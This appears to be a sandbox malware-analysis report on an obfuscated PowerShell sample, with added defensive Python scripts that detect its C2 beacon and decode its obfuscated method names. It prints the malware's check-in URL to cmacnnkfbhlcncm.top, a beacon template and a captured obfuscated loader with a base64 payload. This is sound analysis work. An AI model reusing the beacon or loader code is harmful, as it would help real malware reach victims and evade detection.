Source: | Binary string: lib.pdbI source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *on.pdb] source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBC7000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32rogram Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BRfaul/ source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F02F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB6A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?t.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@ source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG |
Source: global traffic | HTTP traffic detected: GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG |
Source: global traffic | HTTP traffic detected: GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o_tZlJ4VUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=N6d5EthFfEk23Rd250zGQMnb3jZsGgNFA4DtZ0SufK8RRr-Z2xPNQ7fyFiL-0ocS2-nq8xzdP6HigK9P9pq7WskRvrMspdN6PfzwEDiRm_bqI1NO3O6kGqqMa6ehkH1LJx0VLax9UU2wfWW9KDrBqshRKbxf6s7_6w0ugi8CeXGU_Mg16e7FLthBbNRKICJy-pcG |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$a4j1wlqhkmzgpot67gw9l3qf0madz/$zs0pgc72wrmfea1.php?id=$env:computername&key=$frnyclkgbjpa&s= |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527p |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.55127045448.000001A8EFF40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.55125120725.000001A8EFDE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.coS |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzE |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzE |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrSX1VWRg2tbXlThbURnwkjrTfU8D0LargUbq6qrMe084o |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGIa8lrsGIjC48L3OW6KUtlrS |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7A51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D7C2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzE |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D9F46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D92E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D939D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8A40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
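The traffic above is a connectivity check against www.google.com followed by a check-in to cmacnnkfbhlcncm.top whose shape matches the template string recovered from process memory (`http://$host/$name.php?id=$env:computername&key=$key&s=`). The following is an added example, not part of the sandbox report or the sample, of a small triage routine over raw HTTP requests: it recognises the WindowsPowerShell user agent, flags requests whose path and query match the beacon template, and pulls out the fields worth recording. The three sample requests are the ones from the capture re-split one header per line, with the long `q=` parameter and the `NID` cookie shortened; the path pattern (a short lowercase alphanumeric name plus `.php`) is an assumption generalised from the single observed request.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the three requests from the sandbox capture, re-split into one
# header per line. The Google q= parameter and the NID cookie are shortened.
UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151"
SAMPLE_REQUESTS = [
    f"GET / HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: www.google.com\r\nConnection: Keep-Alive\r\n\r\n",
    f"GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjN HTTP/1.1\r\nUser-Agent: {UA}\r\n"
    "Host: www.google.com\r\nCookie: NID=520=N6d5EthF\r\n\r\n",
    f"GET /yudn6r4exvhtr.php?id=computer&key=71902578316&s=527 HTTP/1.1\r\nUser-Agent: {UA}\r\n"
    "Host: cmacnnkfbhlcncm.top\r\nConnection: Keep-Alive\r\n\r\n",
]

# Invoke-WebRequest / Invoke-RestMethod identify themselves this way; the version is
# the PowerShell build, useful for pivoting but not malicious on its own.
POWERSHELL_UA = re.compile(r"WindowsPowerShell/(\d+(?:\.\d+){3})")
# Assumed generalisation of the single observed path: a short lowercase alphanumeric
# name with a .php extension, matching the "$var.php" template recovered from memory.
BEACON_PATH = re.compile(r"^/[a-z0-9]{6,20}\.php$")
BEACON_PARAMS = {"id", "key", "s"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query dict, host and user agent."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query),
        "host": headers.get("host", ""),
        "ua": headers.get("user-agent", ""),
    }


def classify(req: dict) -> str:
    """'c2-beacon' for the check-in shape, 'powershell-ua' for any other PowerShell request."""
    if not POWERSHELL_UA.search(req["ua"]):
        return "other"
    query = req["query"]
    if (
        req["method"] == "GET"
        and BEACON_PATH.match(req["path"])
        and set(query) == BEACON_PARAMS
        and query["key"][0].isdigit()
        and query["s"][0].isdigit()
    ):
        return "c2-beacon"
    return "powershell-ua"


def beacon_indicators(req: dict) -> dict:
    """Fields to record from a beacon: host, path, victim id, key, the s value, PowerShell build."""
    query = req["query"]
    return {
        "host": req["host"],
        "path": req["path"],
        "id": query["id"][0],
        "key": query["key"][0],
        "s": query["s"][0],
        "powershell": POWERSHELL_UA.search(req["ua"]).group(1),
    }


def triage(raw_requests):
    """Classify each raw request; returns (host, path, verdict) tuples in input order."""
    results = []
    for raw in raw_requests:
        req = parse_request(raw)
        results.append((req["host"], req["path"], classify(req)))
    return results


if __name__ == "__main__":
    for host, path, verdict in triage(SAMPLE_REQUESTS):
        print(f"{verdict:14} {host}{path}")
    print(beacon_indicators(parse_request(SAMPLE_REQUESTS[2])))
```

A `powershell-ua` verdict against an unfamiliar host is a hunting lead, not an alert: plenty of administration scripts send that user agent. The `c2-beacon` verdict is specific enough to block the host and pivot on the `key` value across the proxy logs; the meaning of `key` and `s` is not established by the report, so they are recorded, not interpreted.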
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $rleh0swqxu8v617.(([system.String]::new(@((466387/(39594168/5688)),(-5580+(8629-(4098510/1395))),(-9468+(22541740/2353)),(4595-4474),(846636/10079),(74814/674)))))( $8o670ckbwifesz9 ) $rleh0swqxu8v617.(([char[]]@((4063-3996),(274212/(24607988/(43313548/(40167372/8988)))),(9863-(11607-1855)),(8285-8170),(8900-(-632+(70543880/(506+6974))))) -join ''))()$ko9qcp4ehnibsyw.(([system.String]::new(@((1291-1224),(180-(390456/(40867728/7536))),(-8193+8304),(9966-(2491+(4820+2540))),(4716-(7490-(13578625/(21291284/(14293-(22446790/2294))))))))))()[byte[]] $o5ilj12fkps9y0b = $8o670ckbwifesz9.(([char[]]@((-8403+(7023+1464)),(3908-(3232+(3034-2469))),(-3452+(1502+(-7240+9255))),(-572+686),(673398/5907),(3073-(17844096/5996)),(37+(7393-7309))) -join ''))() $yvoshkgni4d5ajl=$o5ilj12fkps9y0b return $yvoshkgni4d5ajl}[System.Text.Encoding]::ascii.(([char[]]@((73982/1042),(-1220+1321),(-257+(-8994+(7449+1918))),(3005-(1457+(2364510/1614))),(-3149+3265),(-5438+5552),(2545-(-3255+5695)),(1005620/9142),(1010533/9811)) -join ''))((m0x37uqa16toeih8ljnvspyz9rb 
"Lup+bHdzbWZgctTxbA5qOwX1wkWkjRgKAdpFBcCJERk8YsuqF/rdgHWCKEhoUdmCoEn/ThL53wK9jJYT71tLeB76Rl89Ca7+t1Kry7jaF1nOGMfSxuSLF4OXgYS1g6C9Fs4okAOPmYvH+e61zpGGBIgFEpSemJCvyKizlaKNgLPn0V4Fx84o8uvt0FsayoTlzLSK81iMEZeGl5LBzIRBO7AkwjmJnBZVR8iNt46qqLWXv48l6oyaJ+0xhN3LxAoEFC6thCrYUIIB6SplAo7+TTmoc9qP11QxLip4H5rCgIr73c9HpLF9015eIl/R2G7XQgQYUYQ0U1bjrg1hH/3QivUtm5rSl7wdnt67zYJaVFFyYIP+RGaLScGxOIsuXwNEK93gNwz8uBeznBtiBE/XnE3MjcupyzxVR9opWgjK1ZqTkeq5yA758po8w1BbHcdXCFzIkJmbElDbnA9dhkPD+JEepbpcdmfewL0FhNapLrDyj8VH5OQf9zQAHmy9qRYML1TCpUzs2ZyOKgQIbF+MiqqRHrDfCNQH38Se9QUY8HOO9Qd5o/7NYzIMQ1NBxc0CpoPk1VFOzpVFvUcSirXqFYDHQLihy2zRSW4rF0Z0ojeh5pKuCLSUCkHMIprF3x6vVooitZE8gKqf/6AGei4HQtoZINedTr6A95sOQVpfUI+2zz1dxHsDPk61XYGEn3E51w3B8cC8UTuwSHMLk7nc6KjF2l4xzRcNHsDGkUvhMFLglt96ojxeqruoDocEDnZ8SvxbTyEYo+vnO9Cu8YfxtgqcpOilZ4TouUM2EQdWOxj7gC0wGNqrTf+UMx3/CJK/z4P8ok41W/Q/G0Z5qilu1tKF/6EDSOK07bMlQ2Gv5D2xnr4rpw2n9X+QN3NiN7aduDypEQacuP3DJV7N6sLdp6CIsKk7roLNrg6SlRGtkta9HGLxDZaQG+scw9fTkOzyVQx+Av5dHdjfLU5VLlzIUIiaiYqd4T6lb385Y44XIbOVtLsLwZ7G+CW4A7z2N5WAjSxXeUoZS7AcJhvmrBG8amgp9i6owxyZp52F6dcVhjtDHcNNFiPFwZbE3Jey4kMD0Omn6UKIhYB+GJwcNS3atmIFRul3CskTRdhJEokTno2jbKAc0sJ5qM3L5ZGgKp+iuO8oL6bCnWoIcR6HIsBHh0Y79zadLbMggJ1vmwoPEZCOkU6Mc7CNOnTbjDtuToz2WpCy/AebixOdraiP6qZZcyrOFt5R1oeFJi6hn6gPccdJWseX31o3GHLieeBagdr6GXIfMgFwCAXUSrLfiEhgC6/oLv/3KXjdKDPiPk+fJ1huU9KNnbh+c79uMmAmg+iOCHopD3rNQV9ACQ |
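The member names in the AMSI capture above are built at run time from integer arithmetic: each element of an `@(...)` array evaluates to one character code, and `[system.String]::new(...)` or `[char[]] ... -join ''` turns the array into the method name that `$obj.((...))()` then invokes. The script below is an added example, not part of the report or the sample: it finds every such array in the captured text, evaluates the arithmetic with a restricted parser rather than `eval`, and rewrites each call with the recovered name as a quoted literal (`$obj.(('Name'))()` is still valid PowerShell). The embedded input is the captured line copied from the report; the base64 argument passed to `m0x37uqa16toeih8ljnvspyz9rb` is left out.

```python
import ast
import re
from fractions import Fraction

# Constructed sample: the captured line from the AMSI entry above, copied from the
# report; the base64 string passed to m0x37uqa16toeih8ljnvspyz9rb is left out.
SAMPLE = (
    "[IO.Compression.CompressionMode]::Decompress)) $rleh0swqxu8v617.(([system.String]::new(@("
    "(466387/(39594168/5688)),(-5580+(8629-(4098510/1395))),(-9468+(22541740/2353)),(4595-4474),"
    "(846636/10079),(74814/674)))))( $8o670ckbwifesz9 ) $rleh0swqxu8v617.(([char[]]@((4063-3996),"
    "(274212/(24607988/(43313548/(40167372/8988)))),(9863-(11607-1855)),(8285-8170),"
    "(8900-(-632+(70543880/(506+6974))))) -join ''))()$ko9qcp4ehnibsyw.(([system.String]::new(@("
    "(1291-1224),(180-(390456/(40867728/7536))),(-8193+8304),(9966-(2491+(4820+2540))),"
    "(4716-(7490-(13578625/(21291284/(14293-(22446790/2294))))))))))()[byte[]] $o5ilj12fkps9y0b = "
    "$8o670ckbwifesz9.(([char[]]@((-8403+(7023+1464)),(3908-(3232+(3034-2469))),"
    "(-3452+(1502+(-7240+9255))),(-572+686),(673398/5907),(3073-(17844096/5996)),(37+(7393-7309))) "
    "-join ''))() $yvoshkgni4d5ajl=$o5ilj12fkps9y0b return $yvoshkgni4d5ajl}[System.Text.Encoding]::ascii.(("
    "[char[]]@((73982/1042),(-1220+1321),(-257+(-8994+(7449+1918))),(3005-(1457+(2364510/1614))),"
    "(-3149+3265),(-5438+5552),(2545-(-3255+5695)),(1005620/9142),(1010533/9811)) -join ''))((m0x37uqa16toeih8ljnvspyz9rb"
)

_ARITH_ONLY = re.compile(r"[\d\s+\-*/()]+")
_OPS = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
        ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}


def eval_int_expr(text: str) -> int:
    """Evaluate an integer expression built only from + - * / and parentheses.

    PowerShell's / on integers is exact here by construction of the obfuscator;
    Fraction keeps that exactness and any non-integer result is rejected.
    """
    if not _ARITH_ONLY.fullmatch(text):
        raise ValueError("not an arithmetic expression: %r" % text)

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return Fraction(node.value)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            value = walk(node.operand)
            return -value if isinstance(node.op, ast.USub) else value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported syntax: %s" % ast.dump(node))

    result = walk(ast.parse(text.strip(), mode="eval"))
    if result.denominator != 1:
        raise ValueError("non-integer result for %r" % text)
    return int(result)


def _matching_paren(s: str, i: int) -> int:
    """Index of the ')' closing the '(' at s[i], or -1 if unbalanced."""
    depth = 0
    for k in range(i, len(s)):
        if s[k] == "(":
            depth += 1
        elif s[k] == ")":
            depth -= 1
            if depth == 0:
                return k
    return -1


def _split_top_level(s: str) -> list:
    """Split on commas that are not nested inside parentheses."""
    parts, depth, cur = [], 0, []
    for ch in s:
        if ch == "," and depth == 0:
            parts.append("".join(cur))
            cur = []
            continue
        depth += ch == "("
        depth -= ch == ")"
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def decode_member_names(script: str) -> list:
    """Return (start, end, name) for each @( ... ) whose elements all evaluate to printable ASCII."""
    hits, i = [], 0
    while (i := script.find("@(", i)) >= 0:
        j = _matching_paren(script, i + 1)
        if j < 0:
            break
        try:
            codes = [eval_int_expr(e) for e in _split_top_level(script[i + 2:j])]
        except (ValueError, SyntaxError, ZeroDivisionError):
            codes = []  # an array of something other than arithmetic: skip it
        if codes and all(32 <= c < 127 for c in codes):
            hits.append((i, j + 1, "".join(map(chr, codes))))
        i = j
    return hits


def rewrite(script: str) -> str:
    """Replace each decoded array, plus its [system.String]::new(...) or [char[]] ... -join ''
    wrapper, with a single-quoted literal so the calls read as what they are."""
    out = script
    for start, end, name in reversed(decode_member_names(script)):  # right to left keeps offsets valid
        before, after = out[:start], out[end:]
        if before.lower().endswith("[system.string]::new(") and after.startswith(")"):
            start, end = start - len("[system.String]::new("), end + 1
        elif before.lower().endswith("[char[]]") and after.startswith(" -join ''"):
            start, end = start - len("[char[]]"), end + len(" -join ''")
        out = out[:start] + repr(name) + out[end:]
    return out


if __name__ == "__main__":
    print([name for _, _, name in decode_member_names(SAMPLE)])
    print(rewrite(SAMPLE))
```

On the captured line this recovers `CopyTo`, `Close`, `Close`, `ToArray` and `GetString`, which together with the `[IO.Compression.CompressionMode]::Decompress` fragment show a decompress-to-bytes helper whose ASCII output is the next stage; the base64 blob that follows is its input. The parser accepts only digits, whitespace, the four operators and parentheses, so a script that smuggles a method call into one of these arrays is rejected rather than executed.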